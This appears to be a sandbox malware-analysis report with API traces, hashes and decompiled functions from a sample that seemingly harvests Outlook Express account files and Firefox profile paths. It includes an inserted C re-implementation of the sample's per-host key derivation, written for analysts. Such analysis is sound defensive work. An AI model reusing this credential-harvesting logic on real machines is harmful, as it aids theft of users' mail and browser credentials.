                                                                                                                                                                  • Instruction Fuzzy Hash: 6B21D372815615AFEB259F18C6809BA73B4EB55354B10003FECC1E73D1EF78EC9186A8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 004089BB: SetFilePointer.KERNEL32(0040A46B,?,00000000,00000000,?,0040A271,00000000,00000000,?,00000020,?,0040A401,?,?,*.*,0040A46B), ref: 004089C8
                                                                                                                                                                  • _memicmp.MSVCRT ref: 0040A1B9
                                                                                                                                                                  • memcpy.MSVCRT ref: 0040A1D0
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FilePointer_memicmpmemcpy
                                                                                                                                                                  • String ID: URL
                                                                                                                                                                  • API String ID: 2108176848-3574463123
                                                                                                                                                                  • Opcode ID: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                  • Instruction ID: 99369b2f7b4a62638f95efb923bbf95607b210eae314fb40be60fbcdcdd136bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 0ab65471aa39f3e32cca0cb723868807121227734642166b6a1d255f25c2e27e
                                                                                                                                                                  • Instruction Fuzzy Hash: 8E11E371200304BBEB11DF65CC05F5F7BA8AF91348F00407AF904AB391EA39DA20C7A6
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintfmemcpy
                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                  • API String ID: 2789212964-323797159
                                                                                                                                                                  • Opcode ID: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                  • Instruction ID: da81b6977c0b6fb050ee50f61be4767a81b1db5370a865e3ffb8ab5306406039
                                                                                                                                                                  • Opcode Fuzzy Hash: d16808a51bbc7474834844d6a398450cf8754e6776392b16b10eb0a45586ee87
                                                                                                                                                                  • Instruction Fuzzy Hash: D311A132A00208BFEB40DFE8C986AAF73B8FB45714F10843BED55E7141D6789A558F95
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(?,00000000,00000000,?,004176FC,?,00000000), ref: 00417518
                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00417524
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseFileHandleUnmapView
                                                                                                                                                                  • String ID: NA
                                                                                                                                                                  • API String ID: 2381555830-2562218444
                                                                                                                                                                  • Opcode ID: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                  • Instruction ID: 5a1a322b0db6f4624e604a7b594929ce6c45ce98bd99ef11bc86fd7bf5bcef0d
                                                                                                                                                                  • Opcode Fuzzy Hash: d40bf1f6c7c19c9d983791adfa5e9ad4e6f6ebbcc0410757e5a5cd4d668ca904
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D11BF36504B10EFC7329F28D944A9777F5FF40752B40092EE94296A61D738F981CB58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407D7B: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,00444305,00000000,?,00000000,00000000,0041274B,?,?), ref: 00407D8D
                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 0040AE7C
                                                                                                                                                                    • Part of subcall function 00409539: ??2@YAPAXI@Z.MSVCRT ref: 00409542
                                                                                                                                                                    • Part of subcall function 0040897D: ReadFile.KERNELBASE(?,?,CCD,00000000,00000000,?,?,00444343,00000000,00000000), ref: 00408994
                                                                                                                                                                    • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 0040907D
                                                                                                                                                                    • Part of subcall function 00409064: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401DEE,00000000,00000001,00000000), ref: 004090A2
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF,00000000), ref: 0040AECC
  • Part of subcall function 00409552: ??3@YAXPAX@Z.MSVCRT ref: 00409559
Memory Dump Source (applies to every function record below)
• Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
• String ID: {@
• API String ID: 2445788494-1579578673
• Opcode ID: c255d9c27d1defa37b3e30fcff96da51efc1fad4c64b69bf173537adafc66d1e
• Instruction ID: c5e992bc26eaba96ccce0a59eaf6c8ec24c3530ff69697df2342695e73c728e4
• Instruction Fuzzy Hash: A1113376804208AFCB01AF69DC45CDA7B78EE05364751C27BF515A7192D6349E04CBA5
• Uniqueness Score: -1.00%

Similarity
• API ID: _snwprintf
• String ID: %%-%d.%ds
• API String ID: 3988819677-2008345750
• Opcode ID: 483dcaac6a08b5d03ce4074c4c19aa481c1388c04e02163b2fa0e4fc7d7ec376
• Instruction ID: fa2a5c48b8b1081f9110b67312fe06c807ccf1e61c825d072a06322f14435401
• Instruction Fuzzy Hash: 2D01B171600304AFD711EF69CC82E5ABBA9FF8C714B10442EFD46A7292C679F851CB64
• Uniqueness Score: -1.00%

Similarity
• API ID: FileNameSavewcscpy
• String ID: X
• API String ID: 3080202770-3081909835
• Opcode ID: ebc7cc994b1ae799fe580d521e5066964324ca7fbd572096a573d52571a50e6b
• Instruction ID: 302039dcaac94884f1c4397820c578514485f3c1708042d42c96f5da00a98a83
• Instruction Fuzzy Hash: 3301D3B1E002499FDF01DFE9D9847AEBBF4AB08319F10402EE855E6280DB789949CF55
• Uniqueness Score: -1.00%

Similarity
• API ID: _memicmpwcslen
• String ID: History
• API String ID: 1872909662-3892791767
• Opcode ID: e276876a3a660070092f4bdc0da4bda60b27ab1e2c5d0f7fe8a34c2cfdf5cdf0
• Instruction ID: 6d3e5e79fb5ba3dc045185e0f7d8bb4044f56437cf7f7bc11c2c4fdfd27bba80
• Instruction Fuzzy Hash: D1F0A4721086019BD210EA298841A6BF7E8DB923A8F11053FF89192283DB3DDC5586A9
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BFA6
• SendMessageW.USER32(?,0000105F,00000000,?), ref: 0040BFD5
Similarity
• API ID: MessageSendmemset
• String ID: "
• API String ID: 568519121-123907689
• Opcode ID: 8974f3925887516f6d0a900228c109d4e68bc67ff3c39d3e2085c907346f7644
• Instruction ID: 52ec7358bf223f21f0f54ed804b07356b6d9a4f052c0f3137058475af9765f6b
• Instruction Fuzzy Hash: 66016D75900206ABDB209F5ACC45EAFB7F8FF85745F00802AE855E7281E7349945CF79
• Uniqueness Score: -1.00%

APIs
• GetWindowPlacement.USER32(?,?,?,?,?,0040F3B0,?,General,?,?,?,?,?,00000000,00000001), ref: 0040191D
• memset.MSVCRT ref: 00401930
Similarity
• API ID: PlacementWindowmemset
• String ID: WinPos
• API String ID: 4036792311-2823255486
• Opcode ID: 531d41ac9e6cbf47dd5b0ef28c7d94a06efd8350b381f438b609c2e10ada3800
• Instruction ID: ca976ba5ed3f83ef93de4c78b9b818d0dc8f3eea61e23acacabb71661926745e
• Instruction Fuzzy Hash: 9AF012B0600205EFEB14DF95D899F5A77A8EF04700F54017AF90ADB2D1DBB89900CB69
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040BC4D
• LoadStringW.USER32(X1E,00000000,?,00001000), ref: 0040BC65
  • Part of subcall function 0040B93B: memset.MSVCRT ref: 0040B94E
  • Part of subcall function 0040B93B: _itow.MSVCRT ref: 0040B95C
Similarity
• API ID: memset$LoadString_itow
• String ID: X1E
• API String ID: 2363904170-1560614071
• Opcode ID: 7f112a53103efb0d1130b80e122edadfff3b355a72e37d03c438b452bd6af500
• Instruction ID: f380a03a7eecdd41986674abf89776040d4e37bafc66abb46cfa381fa5204df8
• Instruction Fuzzy Hash: 71F082729013286AF720AB459D4AFDB776CDF05744F00007ABB08E5192DB349A40C7ED
• Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040B94E
• _itow.MSVCRT ref: 0040B95C
  • Part of subcall function 0040B8C2: memset.MSVCRT ref: 0040B8E7
  • Part of subcall function 0040B8C2: GetPrivateProfileStringW.KERNEL32(00453158,?,0044552C,?,00001000,00452F48), ref: 0040B90F
Similarity
• API ID: memset$PrivateProfileString_itow
• String ID: X1E
• API String ID: 1482724422-1560614071
• Opcode ID: 0462ac8b755d67dc9dd51470dc6d3f017a83e147eaeea5c62657f161a75d20dc
• Instruction ID: c527bd8864a1e8dc9924cbacd4c6e7ae812da0d58d0774c54ed9ac8dc2116314
• Instruction Fuzzy Hash: EDE0BFB294021CB6EF11BFA1CC46F9D77ACBB14748F004025FA05A51D1E7B8E6598759
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00408282: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040BE8F,00000000,0040BD42,?,00000000,00000208,?), ref: 0040828D
• wcsrchr.MSVCRT ref: 0040BE92
• wcscat.MSVCRT ref: 0040BEA8
Similarity
• API ID: FileModuleNamewcscatwcsrchr
• String ID: _lng.ini
• API String ID: 383090722-1948609170
• Opcode ID: 85d76508d49b0ff6757e45e150b40472edf209ff8ddcdf29665fd620b319a214
• Instruction ID: 84d8fe8025816c60ed5f34aa0efad718bb16e503e766276e22ad5a10aaf03d01
• Instruction Fuzzy Hash: EDC01262586A20A4F622B622AE03B8A02888F52308F25006FFD00341C2EFAC561180EE
• Uniqueness Score: -1.00%

Similarity
• API ID: memcpy$memset
• String ID:
• API String ID: 438689982-0
• Opcode ID: 98f9746c95fe9bc841d46f0a022c208982e5f612c2d80e193317f2d03ab29597
• Instruction ID: 5583aac8f3c8c6829f169dedbb5c7f3bc80267d871db847419cec400d03eb5c0
• Instruction Fuzzy Hash: A551B375A00215EBDF14DF55D882BAEBB75FF04340F54805AED04A6252E7789E50CBE8
• Uniqueness Score: -1.00%

Similarity
• API ID: ??2@$memset
• String ID:
• API String ID: 1860491036-0
• Opcode ID: 852de0583aef39f36375dc552f64b502989e158c2a9e6a9d74aa6e27cfe29003
• Instruction ID: 98264c0c01cbe32efcdb0ac77575e239005db210b2699cda7c9871cbaaee01ad
                                                                                                                                                                  • Instruction Fuzzy Hash: 4B21B5B0A11700CFD7518F6A8485A16FAE8FF95310B26C9AFD159DB6B2D7B8C440CF14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • wcslen.MSVCRT ref: 00408DD7
                                                                                                                                                                    • Part of subcall function 004080AC: malloc.MSVCRT ref: 004080C8
                                                                                                                                                                    • Part of subcall function 004080AC: memcpy.MSVCRT ref: 004080E0
                                                                                                                                                                    • Part of subcall function 004080AC: free.MSVCRT(00000000,00000000,?,00408F0C,00000002,?,00000000,?,0040923F,00000000,?,00000000), ref: 004080E9
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408DFD
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00409290,?,000000FF), ref: 00408E20
                                                                                                                                                                  • memcpy.MSVCRT ref: 00408E44
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                  • Opcode ID: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                  • Instruction ID: da9404a03362d95f45f68813529404a67aab342ff110b4c830d245a8fa10e0ef
                                                                                                                                                                  • Opcode Fuzzy Hash: 39603b6d7359158d33076ec7bab952e59b6d37e46f731a650a7499c7d7739eb1
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B214F71100604EFD730DF18D98199AB3F5FF853247118A2EF8A69B6E1CB39A915CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,0041767E,?,?,0041767E,00417A93,00000000,?,00417D00,?,00000000), ref: 00416D1A
                                                                                                                                                                  • malloc.MSVCRT ref: 00416D22
                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00417A93,000000FF,00000000,00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D39
                                                                                                                                                                  • free.MSVCRT(00000000,?,0041767E,00417A93,00000000,?,00417D00,?,00000000,00000000,?), ref: 00416D40
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000000B.00000002.302021801.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharMultiWide$freemalloc
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2605342592-0
                                                                                                                                                                  • Opcode ID: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
                                                                                                                                                                  • Instruction ID: b9117e17fd0dd3e97e5004a4b09ed95055046f94a1a1b3665f6ad504cf0e37ce
                                                                                                                                                                  • Opcode Fuzzy Hash: b607c71614b1ca8bec50a9c51f152560627b91c66ff5640af174e5643dcff5fd
                                                                                                                                                                  • Instruction Fuzzy Hash: DAF0377620521E7BE6102565AC40E77779CEB86276B21072BBD10E65D1ED59EC0046B4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Executed Functions

                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E004073B6(signed int _a4) {
                                                                                                                                                                  				char _v5;
                                                                                                                                                                  				char _v6;
                                                                                                                                                                  				char _v7;
                                                                                                                                                                  				char _v8;
                                                                                                                                                                  				char _v9;
                                                                                                                                                                  				char _v10;
                                                                                                                                                                  				char _v11;
                                                                                                                                                                  				char _v12;
                                                                                                                                                                  				char _v13;
                                                                                                                                                                  				char _v14;
                                                                                                                                                                  				char _v15;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				char _v17;
                                                                                                                                                                  				char _v18;
                                                                                                                                                                  				char _v19;
                                                                                                                                                                  				void _v20;
                                                                                                                                                                  				long _v24;
                                                                                                                                                                  				int _v28;
                                                                                                                                                                  				int _v32;
                                                                                                                                                                  				void* _v36;
                                                                                                                                                                  				void _v291;
                                                                                                                                                                  				char _v292;
                                                                                                                                                                  				void _v547;
                                                                                                                                                                  				char _v548;
                                                                                                                                                                  				void _v1058;
                                                                                                                                                                  				short _v1060;
                                                                                                                                                                  				void _v1570;
                                                                                                                                                                  				short _v1572;
                                                                                                                                                                  				int _t88;
                                                                                                                                                                  				signed int _t91;
                                                                                                                                                                  				signed int _t92;
                                                                                                                                                                  				signed int _t94;
                                                                                                                                                                  				signed int _t96;
                                                                                                                                                                  				signed int _t99;
                                                                                                                                                                  				signed int _t104;
                                                                                                                                                                  				signed short* _t110;
                                                                                                                                                                  				void* _t113;
                                                                                                                                                                  				void* _t114;
                                                                                                                                                                  
                                                                                                                                                                  				_t92 = 0;
                                                                                                                                                                  				_v20 = 0xa3;
                                                                                                                                                                  				_v19 = 0x1e;
                                                                                                                                                                  				_v18 = 0xf3;
                                                                                                                                                                  				_v17 = 0x69;
                                                                                                                                                                  				_v16 = 7;
                                                                                                                                                                  				_v15 = 0x62;
                                                                                                                                                                  				_v14 = 0xd9;
                                                                                                                                                                  				_v13 = 0x1f;
                                                                                                                                                                  				_v12 = 0x1e;
                                                                                                                                                                  				_v11 = 0xe9;
                                                                                                                                                                  				_v10 = 0x35;
                                                                                                                                                                  				_v9 = 0x7d;
                                                                                                                                                                  				_v8 = 0x4f;
                                                                                                                                                                  				_v7 = 0xd2;
                                                                                                                                                                  				_v6 = 0x7d;
                                                                                                                                                                  				_v5 = 0x48;
                                                                                                                                                                  				_v292 = 0;
                                                                                                                                                                  				memset( &_v291, 0, 0xff);
                                                                                                                                                                  				_v548 = 0;
                                                                                                                                                                  				memset( &_v547, 0, 0xff);
                                                                                                                                                                  				_v1572 = 0;
                                                                                                                                                                  				memset( &_v1570, 0, 0x1fe);
                                                                                                                                                                  				_v1060 = 0;
                                                                                                                                                                  				memset( &_v1058, 0, 0x1fe);
                                                                                                                                                                  				_v36 = _a4 + 4;
                                                                                                                                                                  				_a4 = 0;
                                                                                                                                                                  				_v24 = 0xff;
                                                                                                                                                                  				GetComputerNameA( &_v292,  &_v24); // executed
                                                                                                                                                                  				_v24 = 0xff;
                                                                                                                                                                  				GetUserNameA( &_v548,  &_v24); // executed
                                                                                                                                                                  				MultiByteToWideChar(0, 0,  &_v292, 0xffffffff,  &_v1572, 0xff);
                                                                                                                                                                  				MultiByteToWideChar(0, 0,  &_v548, 0xffffffff,  &_v1060, 0xff);
                                                                                                                                                                  				_v32 = strlen( &_v292);
                                                                                                                                                                  				_t88 = strlen( &_v548);
                                                                                                                                                                  				_t113 = _v36;
                                                                                                                                                                  				_v28 = _t88;
                                                                                                                                                                  				memcpy(_t113,  &_v20, 0x10);
                                                                                                                                                                  				_t91 = 0xba0da71d;
                                                                                                                                                                  				if(_v28 > 0) {
                                                                                                                                                                  					_t110 =  &_v1060;
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t104 = _a4 & 0x80000003;
                                                                                                                                                                  						if(_t104 < 0) {
                                                                                                                                                                  							_t104 = (_t104 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t96 = ( *_t110 & 0x0000ffff) * _t91;
                                                                                                                                                                  						_t91 = _t91 * 0xbc8f;
                                                                                                                                                                  						 *(_t113 + _t104 * 4) =  *(_t113 + _t104 * 4) ^ _t96;
                                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                                  						_t110 =  &(_t110[1]);
                                                                                                                                                                  					} while (_a4 < _v28);
                                                                                                                                                                  				}
                                                                                                                                                                  				if(_v32 > _t92) {
                                                                                                                                                                  					do {
                                                                                                                                                                  						_t99 = _a4 & 0x80000003;
                                                                                                                                                                  						if(_t99 < 0) {
                                                                                                                                                                  							_t99 = (_t99 - 0x00000001 | 0xfffffffc) + 1;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t94 = ( *(_t114 + _t92 * 2 - 0x620) & 0x0000ffff) * _t91;
                                                                                                                                                                  						_t91 = _t91 * 0xbc8f;
                                                                                                                                                                  						 *(_t113 + _t99 * 4) =  *(_t113 + _t99 * 4) ^ _t94;
                                                                                                                                                                  						_a4 = _a4 + 1;
                                                                                                                                                                  						_t92 = _t92 + 1;
                                                                                                                                                                  					} while (_t92 < _v32);
                                                                                                                                                                  				}
                                                                                                                                                                  				return _t91;
                                                                                                                                                                  			}
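Added example (not part of the Joe Sandbox report and not the sample's own code): the listing above is a host-bound key setup. It copies a fixed 16-byte constant (0xa3 0x1e 0xf3 0x69 0x07 0x62 0xd9 0x1f 0x1e 0xe9 0x35 0x7d 0x4f 0xd2 0x7d 0x48) into the caller's buffer at _a4 + 4, then walks the UTF-16 code units of the user name and, continuing the same counter, the computer name. Each code unit is multiplied by a running 32-bit state that starts at 0xba0da71d and is itself multiplied by 0xbc8f (48271, the MINSTD LCG multiplier) after every character; the product is XORed into dword (counter mod 4) of the 16-byte buffer, and the function returns the final state. The `_a4 & 0x80000003` dance with the negative fix-up is just a signed `counter % 4`. For an analyst this means the 16 bytes differ per victim: whatever the sample does with them cannot be reproduced offline without the victim's user name and computer name. The C below re-implements the routine so that value can be recomputed; it assumes ASCII names (so each UTF-16 code unit produced by MultiByteToWideChar with code page 0 equals the byte value) and stores the dwords little-endian as the x86 original does. Function and constant names are the example's own. This is a multiply-and-XOR mixer, not a cryptographic hash; the per-host binding is the only property it provides.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* The 16 constant bytes written into the output buffer (_v20.._v5 in the listing). */
static const uint8_t KEY_SEED[16] = {
    0xa3, 0x1e, 0xf3, 0x69, 0x07, 0x62, 0xd9, 0x1f,
    0x1e, 0xe9, 0x35, 0x7d, 0x4f, 0xd2, 0x7d, 0x48
};

/* Initial value of the running multiplier (_t91) and its per-character factor.
   0xbc8f is 48271, the MINSTD LCG multiplier, applied here modulo 2^32. */
#define STATE_INIT 0xba0da71du
#define STATE_MUL  0xbc8fu

static uint32_t load_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* One pass of the inner loop over a string. `pos` is the character counter (_a4),
   shared across both strings so the second string continues where the first stopped. */
static void mix_name(uint32_t words[4], const char *name, size_t *pos, uint32_t *state) {
    for (; *name; name++, (*pos)++) {
        /* ASSUMPTION: ASCII names, so the UTF-16 code unit is the zero-extended byte. */
        uint32_t cu = (uint8_t)*name;
        uint32_t mixed = cu * *state;   /* ( *_t110 & 0xffff) * _t91, wraps mod 2^32 */
        *state *= STATE_MUL;             /* _t91 = _t91 * 0xbc8f */
        words[*pos & 3] ^= mixed;        /* (_a4 & 0x80000003) with sign fix-up == pos mod 4 */
    }
}

/* Re-implementation of E004073B6 (example name). Writes the 16 derived bytes to `out`
   (the original writes them at _a4 + 4 of the caller's buffer) and returns the final
   multiplier state, which the original returns in _t91. */
uint32_t derive_host_key(const char *computer_name, const char *user_name, uint8_t out[16]) {
    uint32_t words[4];
    uint32_t state = STATE_INIT;
    size_t pos = 0;
    for (int i = 0; i < 4; i++) words[i] = load_le32(KEY_SEED + 4 * i);
    mix_name(words, user_name, &pos, &state);      /* user name first (the _v28 loop) */
    mix_name(words, computer_name, &pos, &state);  /* then the computer name (the _v32 loop) */
    for (int i = 0; i < 4; i++) store_le32(out + 4 * i, words[i]);
    return state;
}

int main(void) {
    /* Constructed sample input; for a real case use the victim's actual names. */
    uint8_t key[16];
    uint32_t final_state = derive_host_key("DESKTOP-TEST", "user", key);
    printf("key: ");
    for (int i = 0; i < 16; i++) printf("%02x", key[i]);
    printf("\nfinal state: 0x%08x\n", final_state);
    return 0;
}
```

With both names empty the output is exactly the 16-byte constant and the return value is 0xba0da71d, which is a quick way to confirm a dump of the caller's buffer was taken before the mixing ran. Because the two strings share one counter and one state, a single-character user name with an empty computer name yields the same 16 bytes as the reverse; only the concatenated sequence of code units matters.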

APIs
Strings
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
• String ID: 5$H$O$b$i$}$}
• API String ID: 1832431107-3760989150
• Opcode ID: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
• Instruction ID: c4a028c48163d552ebb965a22663fb4caedd15d38ec5c0ca2e6f283cdba292cd
• Opcode Fuzzy Hash: aceb3002e6d76f9fd17eae514da83f7be29cbb3531b765aef18c994d04d9c626
• Instruction Fuzzy Hash: 7A51E771C0025DAEDB11CFA8CC40BEEBBBCEF49314F0442AAE555E6191D3789B85CB65
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E0040702D(void** __eax) {
	void* __esi;
	void* _t15;
	int _t16;
	int _t17;
	void* _t26;
	void** _t38;
	void** _t40;
	void* _t45;

	_t40 = __eax;
	_t15 =  *__eax;
	if(_t15 != 0xffffffff) {
		_t6 =  &(_t40[0x52]); // 0x247
		_t16 = FindNextFileA(_t15, _t6); // executed
		 *(_t45 + 4) = _t16;
		if(_t16 != 0) {
			goto L5;
		} else {
			E004070C5(_t40);
			goto L4;
		}
	} else {
		_t1 =  &(_t40[0x52]); // 0x247
		_t2 =  &(_t40[1]); // 0x103
		_t26 = FindFirstFileA(_t2, _t1); // executed
		 *_t40 = _t26;
		 *(_t45 + 4) = 0 | _t26 != 0xffffffff;
		L4:
		if( *(_t45 + 4) != 0) {
			L5:
			_t9 =  &(_t40[0xa2]); // 0x387
			_t38 = _t9;
			_t10 =  &(_t40[0x5d]); // 0x273
			_t28 = _t10;
			_t41 =  &(_t40[0xf3]);
			_t17 = strlen( &(_t40[0xf3]));
			if(strlen(_t10) + _t17 + 1 >= 0x143) {
				 *_t38 = 0;
			} else {
				E004062B7(_t38, _t41, _t28);
			}
		}
	}
	return  *(_t45 + 4);
}

APIs
• FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
• FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
• strlen.MSVCRT ref: 00407091
• strlen.MSVCRT ref: 00407099
Memory Dump Source
• Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp
Yara matches
Similarity
• API ID: FileFindstrlen$FirstNext
• String ID:
• API String ID: 379999529-0
• Opcode ID: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
• Instruction ID: ee1fc6f362411e34e0c03f62be7ba86f9bee0943d1b98e177d8d8cef5f5d9398
• Opcode Fuzzy Hash: 23327769c2c6ed145b7f0a678d94cded64fbce7ba272a02f3800eca3ff4be886
• Instruction Fuzzy Hash: 1E1182728092059FD3149B34D844ADBB7DC9F04325F204A3FF05AD31D0EB38B945876A
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                                                  			E00401E4A(void* __eflags, char* _a4) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				int _v12;
                                                                                                                                                                  				void _v275;
                                                                                                                                                                  				char _v276;
                                                                                                                                                                  				void _v539;
                                                                                                                                                                  				char _v540;
                                                                                                                                                                  				void _v795;
                                                                                                                                                                  				char _v796;
                                                                                                                                                                  				void _v1059;
                                                                                                                                                                  				char _v1060;
                                                                                                                                                                  				void _v1323;
                                                                                                                                                                  				char _v1324;
                                                                                                                                                                  				void _v2347;
                                                                                                                                                                  				char _v2348;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				int _t65;
                                                                                                                                                                  				char* _t69;
                                                                                                                                                                  				char _t70;
                                                                                                                                                                  				int _t71;
                                                                                                                                                                  				char _t75;
                                                                                                                                                                  				void* _t76;
                                                                                                                                                                  				long _t78;
                                                                                                                                                                  				void* _t83;
                                                                                                                                                                  				int _t85;
                                                                                                                                                                  				void* _t87;
                                                                                                                                                                  				int _t104;
                                                                                                                                                                  				int _t108;
                                                                                                                                                                  				char _t126;
                                                                                                                                                                  				void* _t137;
                                                                                                                                                                  				void* _t139;
                                                                                                                                                                  				char* _t157;
                                                                                                                                                                  				char* _t158;
                                                                                                                                                                  				char* _t160;
                                                                                                                                                                  				int _t161;
                                                                                                                                                                  				void* _t164;
                                                                                                                                                                  				CHAR* _t169;
                                                                                                                                                                  				char* _t170;
                                                                                                                                                                  				void* _t171;
                                                                                                                                                                  				void* _t172;
                                                                                                                                                                  				void* _t173;
                                                                                                                                                                  				void* _t174;
                                                                                                                                                                  				void* _t175;
                                                                                                                                                                  
                                                                                                                                                                  				_v540 = 0;
                                                                                                                                                                  				memset( &_v539, 0, 0x104);
                                                                                                                                                                  				_t164 = 0x1a;
                                                                                                                                                                  				E0040F4CA( &_v540, _t164); // executed
                                                                                                                                                                  				_t65 = strlen("Mozilla\\Profiles");
                                                                                                                                                                  				_t6 = strlen( &_v540) + 1; // 0x1
                                                                                                                                                                  				_t172 = _t171 + 0x14;
                                                                                                                                                                  				if(_t65 + _t6 >= 0x104) {
                                                                                                                                                                  					_t69 = _a4;
                                                                                                                                                                  					 *_t69 = 0;
                                                                                                                                                                  					_t157 = _t69;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					_t157 = _a4;
                                                                                                                                                                  					E004062B7(_t157,  &_v540, "Mozilla\\Profiles");
                                                                                                                                                                  				}
                                                                                                                                                                  				_t70 = E00406155(_t157);
                                                                                                                                                                  				if(_t70 == 0) {
                                                                                                                                                                  					 *_t157 = _t70;
